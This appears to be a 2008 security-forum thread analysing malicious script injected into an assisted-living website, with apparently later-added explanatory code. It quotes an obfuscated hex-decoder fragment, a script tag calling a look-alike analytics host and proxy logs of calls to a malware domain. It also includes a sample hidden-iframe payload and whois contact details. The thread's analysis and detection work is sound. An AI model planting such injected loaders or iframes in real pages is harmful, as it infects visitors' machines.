mysec
Premium Member
join:2005-11-29
to zteardrop
Re: Trojan Win32.Agent.pz from Stoneybrook Assisted Living site

said by Mele20:

I went there on IE8 beta 1 and the moment I clicked on the invitation at the bottom of the main page for the free lunch, Avira immediately heuristically blocked it as unwanted malware.

This invitation-coupon is interesting. The page source includes this at the beginning:

<script src="http://analytics-google.info/i/urchin.js"></script>

If you search for analytics-google.info/i/urchin.js you get some interesting posts about the use of that to give plausibility to the site. Many sites use google urchin. There is no such google site as shown here.

Also, unnoticed when the popup coupon page loads as I clicked on it, is the attempted connection to google-analize.com. However, loading the coupon.html page directly, I observed in the status bar that the page attempts to load:

[screenshot not preserved in the page]

Since nothing cached, I assume google-analize.com is a dead site.

'google-analize' does not reveal itself when searching in the page source, so I assume it is obfuscated in the rest of the script. Some of the code:

<script>
// As posted, the loop's opening brace and the "m4" at the start of the "+=" line were lost; both restored below.
function c41920832628m4864c208c9ef8(m4864c208ca2de){ // parseInt(x, 16)
  function m4864c208ca6c6(){return 16;}
  return (parseInt(m4864c208ca2de,m4864c208ca6c6()));
}
function m4864c208caece(m4864c208cb27e){ // walk the input 2 chars at a time, fromCharCode each hex value
  function m4864c208cbe35(){var m4864c208cc21d=2;return m4864c208cc21d;}
  var m4864c208cb66a='';
  m4864c208cc605=String.fromCharCode;
  for(m4864c208cba4e=0;m4864c208cba4e<m4864c208cb27e.length;m4864c208cba4e+=m4864c208cbe35()){
    m4864c208cb66a+=(m4864c208cc605(c41920832628m4864c208c9ef8(m4864c208cb27e.substr(m4864c208cba4e,m4864c208cbe35()))));
  }
  return m4864c208cb66a;
}
 

I'm hoping to find someone who can convert this to readable text.

The fact that google-analize does not attempt to load when opening the page in Opera indicates that this may be an IE-specific exploit.

A hint that google-analize.com served up malware at one time is seen here:

»www.browsercrm.com/forum ··· =10&t=13
Something urgent, maybe it's nothing, but the first time I open browsercrm.com with Internet Explorer calls to google-analize.com/ and also executes google-analize.com/count.php and google-analize.com/exploits.php ...

Trying these URLs bring up page errors:

[screenshot not preserved in the page]

A search for google-analize.com shows it is in many Hosts files, including MVPS.
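For anyone wanting to see what the quoted routine does without running it in a browser: it is a plain two-character hex decoder (the outer function is parseInt(chunk, 16), the inner one walks the string two characters at a time and appends String.fromCharCode of each value). The block below is an added example written for this thread, not code from the post or from the compromised site. It rewrites the same logic with readable names, refuses malformed chunks instead of emitting NaN characters, and runs it over a constructed hex string that decodes to a harmless placeholder (the host name redirector.example is an assumed, reserved-TLD stand-in, not the real payload), then lists the tags and hosts the decoded text would inject so an analyst can triage it statically.

```javascript
// Added example: readable rewrite of the hex decoder quoted in the post.
// Original: c41920832628m4864c208c9ef8 = parseInt(x, 16);
//           m4864c208caece = walk input 2 chars at a time, fromCharCode each.

// Equivalent of c41920832628m4864c208c9ef8(): parse one hex chunk to an integer.
function hexChunkToInt(chunk) {
  return parseInt(chunk, 16);
}

// Equivalent of m4864c208caece(): decode a string of 2-digit hex values.
// Throws on a short or non-hex chunk instead of silently appending NaN
// characters the way the obfuscated original would.
function decodeHexPairs(encoded) {
  const STEP = 2; // m4864c208cbe35() always returned 2
  let out = '';
  for (let i = 0; i < encoded.length; i += STEP) {
    const chunk = encoded.substr(i, STEP);
    const code = hexChunkToInt(chunk);
    if (chunk.length !== STEP || Number.isNaN(code)) {
      throw new Error(`bad hex chunk ${JSON.stringify(chunk)} at offset ${i}`);
    }
    out += String.fromCharCode(code);
  }
  return out;
}

// Encoder used only to build the constructed sample below; an attacker's page
// would ship the string already encoded. ASCII input only (one byte per char).
function encodeHexPairs(text) {
  let out = '';
  for (const ch of text) {
    out += ch.charCodeAt(0).toString(16).padStart(2, '0');
  }
  return out;
}

// Static triage helper: list the element names and host names the decoded
// text would inject, so the analyst sees what the payload does without
// rendering it.
function summarizeDecoded(decoded) {
  const tags = [...decoded.matchAll(/<\s*([a-zA-Z]+)/g)].map(m => m[1].toLowerCase());
  const hosts = [...decoded.matchAll(/https?:\/\/([^\/"'\s>]+)/g)].map(m => m[1].toLowerCase());
  return { tags: [...new Set(tags)], hosts: [...new Set(hosts)] };
}

// Constructed sample (not the site's real payload): a benign placeholder in the
// hidden-iframe shape described later in the thread, pointing at a reserved
// example host name.
const SAMPLE_PLAINTEXT =
  '<iframe src="http://redirector.example/in.cgi" width="1" height="1"></iframe>';
const SAMPLE_ENCODED = encodeHexPairs(SAMPLE_PLAINTEXT);

if (typeof require !== 'undefined' && require.main === module) {
  const decoded = decodeHexPairs(SAMPLE_ENCODED);
  console.log(decoded);
  console.log(summarizeDecoded(decoded));
}
```

To use it on a real sample, paste the hex string argument from the page source into decodeHexPairs and read the result as text; never feed the decoded output to document.write or eval, which is exactly the step the obfuscated page performs.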


---
Craig08
Member
join:2008-03-31
4 edits

There seems to be a security certificate exploit. I forget the exact details of the certificate (accidentally erased). I can't unscramble the code personally, but what happens is that (Hijack.UserInit) -> Bad: (C:\WINDOWS\system32\userinit.exe, oembios are exploited. I had logging, just not the usual security setup...

No one should be going to these sites except for testing purposes.

Hope that helps,
craig .



Edit:info
Mele20
Premium Member
join:2001-06-05
Hilo, HI
1 edit
to mysec
google-analize.com is in the status bar of Fx3 when it loads the coupon page on a separate tab (after I click on the meal image on the main page). Proxo has a BUNCH of references to it in its log. Here's one:

+++GET 3108+++
GET /sl_style.css HTTP/1.1
Host: www.seniorlivinginstyle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008051206 Firefox/3.0.9.9
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, x-gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Referer: hxxp://www.seniorlivinginstyle.com/popup/coupon_01.html
Connection: keep-alive
Match 3105: : Mark First - Remove Dupes 7.07.23 (multi) [sd] (d.r)
Match 3105: Bottom Mark: Start - Close open Tags 7.06.15 (multi) [sd] (d.r)
Match 3105: Bottom Mark: Start - Close open Tags 7.06.15 (multi) [sd] (d.r)
Match 3105: Bottom Add: Final JS Code 7.09.06 (ccw! !mos) [...] (d.r)
Match 3105: Bottom Mark: End 3.12.08 [sd] (d.r)
Match 3105: : Mark First - Remove Dupes 7.07.23 (multi) [sd] (d.r)
Match 3105: : Mark First - Remove Dupes 7.07.23 (multi) [sd] (d.r)
+++CLOSE 3105+++

+++RESP 3108+++
HTTP/1.1 200 OK
Date: Sat, 06 Sep 2008 06:51:37 GMT
Server: Apache/1.3.34 (Unix) filter/1.0 PHP/4.4.4
Last-Modified: Mon, 26 May 2008 10:40:08 GMT
ETag: "40058-280f-483a9388"
Accept-Ranges: bytes
Content-Length: 10255
Content-Type: text/css
Cache-Control: public, max-age=86400
Match 3108: Protect: CSS Comments 7.06.15 (dmp) [jd sd] (d.r)
Match 3108: Top All Mark: Start 4.07.11 (multi) [sd] (d.r)
Match 3108: Top All Mark: End 6.12.25 [sd] (d.r)
Match 3108: Protect: CSS Comments 7.06.15 (dmp) [jd sd] (d.r)
Match 3108: Protect: CSS Comments 7.06.15 (dmp) [jd sd] (d.r)
Match 3108: Protect: CSS Comments 7.06.15 (dmp) [jd sd] (d.r)
Match 3108: Protect: CSS Comments 7.06.15 (dmp) [jd sd] (d.r)
Match 3108: Protect: CSS Comments 7.06.15 (dmp) [jd sd] (d.r)
Match 3108: Protect: CSS Comments 7.06.15 (dmp) [jd sd] (d.r)
Match 3108: Protect: CSS Comments 7.06.15 (dmp) [jd sd] (d.r)
Match 3108: Protect: CSS Comments 7.06.15 (dmp) [jd sd] (d.r)
+++CLOSE 3108+++
BlockList 3109: in User-Agents, line 77

+++GET 3109+++
GET /in.cgi?15&xu=1& HTTP/1.1
Host: google-analize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008051206 Firefox/3.0.9.9
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, x-gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Referer: »google-analize.com/
Connection: keep-alive
+++CLOSE 3109+++
BlockList 3110: in Bypass-List, line 19
BlockList 3111: in User-Agents, line 77

I'm going to keep Proxo's log window open and go there again on IE.

+++GET 3397+++
GET /popup/coupon_01.html HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-silverlight, application/x-shockwave-flash, */*
Referer: hxxp://www.seniorlivinginstyle.com/community/stoneybrook.html
Accept-Language: en-us
UA-CPU: x86
Accept-Encoding: gzip, x-gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1)
Host: www.seniorlivinginstyle.com
Connection: keep-alive

+++RESP 3397+++
HTTP/1.1 200 OK
Date: Sat, 06 Sep 2008 07:36:26 GMT
Server: Apache/1.3.34 (Unix) filter/1.0 PHP/4.4.4
Last-Modified: Fri, 27 Jun 2008 10:41:40 GMT
ETag: "f806b-d71-4864c3e4"
Accept-Ranges: bytes
Content-Length: 3441
Content-Type: text/html
Cache-Control: max-age=1
Match 3397: Top All Mark: Start 4.07.11 (multi) [sd] (d.r)
Match 3397: Top All Mark: End 6.12.25 [sd] (d.r)
Match 3397: Top JS Mark: Start 7.04.02 (multi) [sd] (d.r)
Match 3397: Top JS: Mark End 7.04.02 [sd] (d.r)
Match 3397: Top HTML Mark: Start 6.12.25 (multi) [sd] (d.r)
Match 3397: Top Sniff: HTML Content: HTML 7.08.05 (multi) [sd] (d.1)
Match 3397: Top HTML Mark: End 3.12.08 [sd] (d.r)
Match 3397: Header Top Mark: Start - Fix 7.09.09 (multi) [sd] (d.r)
Match 3397: Header Top Add: Initial JS Code 7.09.05 (ccw! !mos) [...] (d.r)
Match 3397: Header Top Mark: End 7.09.06 (multi) [sd] (d.r)
BlockList 3397: in AdPaths-J, line 83
Match 3397: Block: Scripts by URL 7.09.07 [pr] (d.2)
Match 3397: Header Bot Mark: Start - Fix 7.09.06 (multi) [sd] (d.r)
Match 3397: Header Bot Add: Default Script/Style Type if Missing 7.08.31 [sd] (d.1)
Match 3397: Header Bot Add: Navigation Links 4.11.01 [sd] (d.1)
Match 3397: Header Bot Mark: End 3.12.08 [sd] (d.r)
Match 3397: Mark: Start 5.11.05 (multi) [sd] (d.r)
Match 3397: : Mark First - Remove Dupes 7.07.23 (multi) [sd] (d.r)
Match 3397: Bottom Mark: Start - Close open Tags 7.06.15 (multi) [sd] (d.r)
Match 3397: : Mark First - Remove Dupes 7.07.23 (multi) [sd] (d.r)
Match 3397: Bottom Mark: Start - Close open Tags 7.06.15 (multi) [sd] (d.r)
Match 3397: Bottom Mark: Start - Close open Tags 7.06.15 (multi) [sd] (d.r)
Match 3397: Bottom Add: Final JS Code 7.09.06 (ccw! !mos) [...] (d.r)
Match 3397: Bottom Mark: End 3.12.08 [sd] (d.r)
Match 3397: : Mark First - Remove Dupes 7.07.23 (multi) [sd] (d.r)
Match 3397: : Mark First - Remove Dupes 7.07.23 (multi) [sd] (d.r)
+++CLOSE 3397+++
BlockList 3398: in User-Agents, line 72
BlockList 3399: in User-Agents, line 72

+++GET 3399+++
GET /in.cgi?15&xu=1& HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-silverlight, application/x-shockwave-flash, */*
Referer: »google-analize.com/
Accept-Language: en-us
UA-CPU: x86
Accept-Encoding: gzip, x-gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1)
Host: google-analize.com

On IE I see a transparent gif. Could it be the problem?

BlockList 3400: in User-Agents, line 72

+++GET 3400+++
GET /images/coupon-freemeal.gif HTTP/1.1
Accept: */*
Referer: hxxp://www.seniorlivinginstyle.com/popup/coupon_01.html
Accept-Language: en-us
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1)
Host: www.seniorlivinginstyle.com
Connection: keep-alive
BlockList 3401: in User-Agents, line 72

+++GET 3401+++
GET /images/trans.gif HTTP/1.1
Accept: */*
Referer: hxxp://www.seniorlivinginstyle.com/popup/coupon_01.html
Accept-Language: en-us
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1)
Host: www.seniorlivinginstyle.com
Connection: keep-alive

Avira now alerts AFTER the coupon tab opens on IE8. It was alerting before that earlier.

I reported the site as malicious to Microsoft.
mysec
Premium Member
join:2005-11-29

Thanks for the Proxo logs. I reloaded the main page and then cleared the cache. Clicking on the coupon, I see that what is cached confirms your logs as to what is loaded from the seniorlivinginstyle.com site:

------------------------
GET /popup/coupon_01.html
GET /images/coupon-freemeal.gif
GET /images/trans.gif
------------------------
[screenshot not preserved in the page]

The transparent image (trans.gif) you mention doesn't seem to do anything.

Then your log shows

--------------------------------
GET /in.cgi?15&xu=1&
google-analize.com
--------------------------------

Since nothing caches, this confirms that the site is down. If that 'in.cgi' page did load, it might have called out for malware files as indicated in my link in above post.

A search for google-analize.com shows it registered to baumeisterlotze@web.de

Two listings here:

Malware Domain List
2008/06/19_14:50 google-analize.com/in.cgi?4 baumeisterlotze@web.de
2008/09/05_22:50 google-analize.com/in.cgi?15&22768ef22da7 baumeisterlotze@web.de
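The Proxo excerpts in the two posts above are the kind of thing worth checking mechanically: every request in the log carries a Host and a Referer, so a third-party host (one that differs from the referring page's host) or a host that already sits in a hosts-file blocklist such as MVPS stands out at once. The block below is an added example, not Proxomitron's own tooling or anything from the thread: it parses a constructed log excerpt modelled on the posted one (same +++GET n+++ framing, same coupon and in.cgi requests), parses a constructed hosts-file excerpt that lists the two domains named in this thread, and reports each request that is blocklisted or third-party.

```javascript
// Added example: flag suspicious requests in a Proxomitron-style log excerpt.

// Constructed sample log modelled on the excerpt posted in the thread (not the
// original log). Request framing and the coupon/in.cgi paths mirror the post.
const SAMPLE_LOG = `
+++GET 3397+++
GET /popup/coupon_01.html HTTP/1.1
Referer: http://www.seniorlivinginstyle.com/community/stoneybrook.html
Host: www.seniorlivinginstyle.com

+++RESP 3397+++
HTTP/1.1 200 OK
Content-Type: text/html
+++CLOSE 3397+++

+++GET 3399+++
GET /in.cgi?15&xu=1& HTTP/1.1
Referer: http://www.seniorlivinginstyle.com/popup/coupon_01.html
Host: google-analize.com

+++GET 3401+++
GET /images/trans.gif HTTP/1.1
Referer: http://www.seniorlivinginstyle.com/popup/coupon_01.html
Host: www.seniorlivinginstyle.com
`;

// Constructed hosts-file excerpt; the thread reports google-analize.com is in
// the MVPS hosts file, and analytics-google.info is the other domain named.
const SAMPLE_HOSTS_FILE = `
# constructed excerpt, not the real MVPS file
127.0.0.1 localhost
0.0.0.0 google-analize.com
0.0.0.0 analytics-google.info
`;

// Parse hosts-file syntax into the set of blocked names (comments, blank
// lines and the localhost entry are ignored).
function parseHostsFile(text) {
  const blocked = new Set();
  for (const raw of text.split('\n')) {
    const line = raw.replace(/#.*/, '').trim();
    if (!line) continue;
    const [, ...names] = line.split(/\s+/);
    for (const n of names) if (n !== 'localhost') blocked.add(n.toLowerCase());
  }
  return blocked;
}

// Split the log into request records { id, path, host, referer }. Header
// lines after a +++RESP/+++CLOSE marker belong to the response and are skipped.
function parseProxoLog(text) {
  const records = [];
  let cur = null;
  for (const line of text.split('\n')) {
    const start = line.match(/^\+\+\+GET (\d+)\+\+\+$/);
    if (start) {
      cur = { id: start[1], path: null, host: null, referer: null };
      records.push(cur);
      continue;
    }
    if (/^\+\+\+(RESP|CLOSE) \d+\+\+\+$/.test(line)) { cur = null; continue; }
    if (!cur) continue;
    const req = line.match(/^GET (\S+) HTTP\/1\.[01]$/);
    if (req) { cur.path = req[1]; continue; }
    const hdr = line.match(/^(Host|Referer): (.*)$/);
    if (hdr) cur[hdr[1].toLowerCase()] = hdr[2].trim();
  }
  return records;
}

// Host part of a URL; the scheme match is loose so defanged "hxxp://" works too.
function hostOf(url) {
  const m = url && url.match(/^[a-z]+:\/\/([^\/]+)/i);
  return m ? m[1].toLowerCase() : null;
}

// One finding per request whose Host is blocklisted or differs from the
// referring page's host. Returns [{ id, host, path, reasons }].
function flagRequests(logText, hostsText) {
  const blocked = parseHostsFile(hostsText);
  const findings = [];
  for (const r of parseProxoLog(logText)) {
    const host = (r.host || '').toLowerCase();
    const refHost = hostOf(r.referer);
    const reasons = [];
    if (blocked.has(host)) reasons.push('host in blocklist');
    if (refHost && refHost !== host) reasons.push(`third-party to ${refHost}`);
    if (reasons.length) findings.push({ id: r.id, host, path: r.path, reasons });
  }
  return findings;
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(flagRequests(SAMPLE_LOG, SAMPLE_HOSTS_FILE));
}
```

On the sample above only request 3399 is reported, for both reasons at once; the coupon page and its images are first-party and pass. Feeding the real MVPS file into parseHostsFile is the same call, since it uses the same one-address-per-line syntax.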



---

Millenniumle
Member
join:2007-11-11
Fredonia, NY
1 edit

"http://analytics-google.info/i/urchin.js"
whois.net gives the registrant of analytics-google.info to:

Registrant Name:Kozenko Denis
Registrant Organization:N/A
Registrant Street1:Entuziastov, 24/81
Registrant Street2:
Registrant Street3:
Registrant City:St. Petersburg
Registrant State/Province:Leningradskaya oblast
Registrant Postal Code:78321
Registrant Country:RU
Registrant Phone:+007.9021012879
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email:djadefb@mail.ru

Mr Kozenko of Russia.

======================================

I ran the link in IE6 SP3, XP Pro SP3, Guest account, scripts enabled, and default Software Restriction Policies. I didn't get any prompts or warnings. I don't have Java installed and XP is updated.

I don't even see the urchin.js file in my internet temp files. Perhaps having "Launching programs and files in an IFrame" set to disabled blocked the script as a "file?"

Then again, maybe I got hosed and don't know it.

Edit: MVP Hosts file squashed it. +1 to the hosts file.
mysec
Premium Member
join:2005-11-29
2 edits

said by Millenniumle:

I don't even see the urchin.js file in my internet temp files.

EDIT: I didn't see your Edit!

The URL to that file returns a page-not-found error, so it can't cache in any case.

For more on how that file worked in other exploits search for 'analytics-google.info/i/urchin.js'

You will see the same code that is in the coupon_01.html page posted above.

It seems that in this current situation, both the analytics-google.info and google-analize.com sites do not work, hence, the exploit cannot start.


---
calathea
Member
join:2001-12-29
Scio, OR
to Craig08
craig08, can you elaborate on your certificate exploit comment? One thing this did was to kill my digital badge. I got another one which worked for a few minutes then it also quit working.

A question: assuming a keylogger is running on a machine, if you copy a password from a file and paste it into the application, does the keylogger see the characters of the password? Or does it just see the control-c control-v?

Thanks to everyone (mysec, mele20, zteardrop, therube, craig08, milleniumle, & &) for the information; hopefully the site will get cleaned up soon.
germ2893
Member
join:2008-09-23
Wichita, KS
to mysec
To the person who wanted the script converted to readable text:

Chances are it's just like this script:

»forums.oscommerce.com/in ··· c=315563

It boils down to an iframe - what a concept.

I haven't decoded the exact script you posted, but I'd guess it does the same thing.